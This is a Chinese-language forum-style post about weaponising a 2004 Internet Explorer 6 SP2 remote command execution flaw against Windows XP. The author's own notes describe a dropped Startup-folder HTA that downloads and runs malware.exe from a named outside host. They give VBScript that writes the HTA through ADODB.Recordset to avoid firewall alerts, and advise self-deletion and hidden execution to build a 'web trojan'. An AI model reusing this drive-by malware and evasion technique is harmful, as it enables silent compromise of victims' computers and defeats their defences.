利用漏洞：
Microsoft Internet Explorer SP2远程任意命令执行漏洞

发布日期：2004-12-23

受影响系统：
Microsoft Internet Explorer 6.0SP2
   - Microsoft Windows XP Professional SP2
   - Microsoft Windows XP Home SP2

Microsoft Internet Explorer结合多种漏洞如Help ActiveX控件等问题，远程攻击者可以利用这个漏洞无需用户交互来执行任意文件而导致恶

意代码执行.

详见：_bug&do=view&bug_id=7272&keyword=">绿盟

        冰狐浪子的个人测试及分析

    因为所公布的测试页面是用于英文版本的winxp系统,所以用中文系统测试前，要先建立如下目录

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\

我利用所给的测试页面进行测试，发现如果装有防火墙,会提示应用程序alg.exe访问网络,选择允许后,察看C:\Documents and Settings\All

Users\Start Menu\Programs\Startup\目录发现被写入一文件"Microsoft Office.hta",运行"Microsoft Office.hta",发现自动从

http://freehost07.websamba.com/greyhats/malware.exe下载并运行了一个精美的火焰DEMO,C盘根目录下面出现malware.exe程序[需要说明的

是运行Microsoft Office.hta时防火墙并没有报警]!
   我察看代码后发现防火墙报警的原因为writehta.txt里的代码是通过访问远程数据库来获得要写入Microsoft Office.hta里的代码的,如果

我们不访问数据库而直接把hta的代码写到脚本里,就可以不引起防火墙的报警啦!呵呵
方法是调用ADODB.Recordset,把用到的代码写为一条记录,我也是在网上找到的代码代码如下:

on error resume next
set evanchik = CreateObject("ADODB.Recordset")
  With evanchik
      .Fields.Append "evanchik", 200, "3000"
      Call .Open
      Call .AddNew
      .Fields("evanchik").Value = "meaning less shit i had to put here"
      Call .AddNew
      .Fields("evanchik").Value = "此处写上要写到启动目录里的具体代码"
      Call .Update
  End With
evanchik.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
evanchik.Close

解决了防火墙问题,接下来就要看如何隐蔽开机后hta文件的运行啦,具体我就不写啦,请参照网上以前object漏洞的利用代码,也就是现在网上所

谓的"不闪的网页木马"!需要注意一点,hta最好加上自动删除功能,这样就运行一次后不会被后来轻易发现!

另外这个漏洞做的网页木马会打开一帮助文件,如果你觉得不太好的话,可以利用帮助控件里的
Close参数进行自动关闭!
至此一个XPsp2的网页木马顺利完工!

不足之处:
1.因为我没找到可以直接自动运行的方法,只有写到启动文件夹里,等机器重新启动后运行hta文件,容易被发现后清除,使得木马无法被下载运行
2.因为要调用本地的htm或chm文件,获得写文件权限,所以当系统不是默认安装在C盘下时,无法写入文件!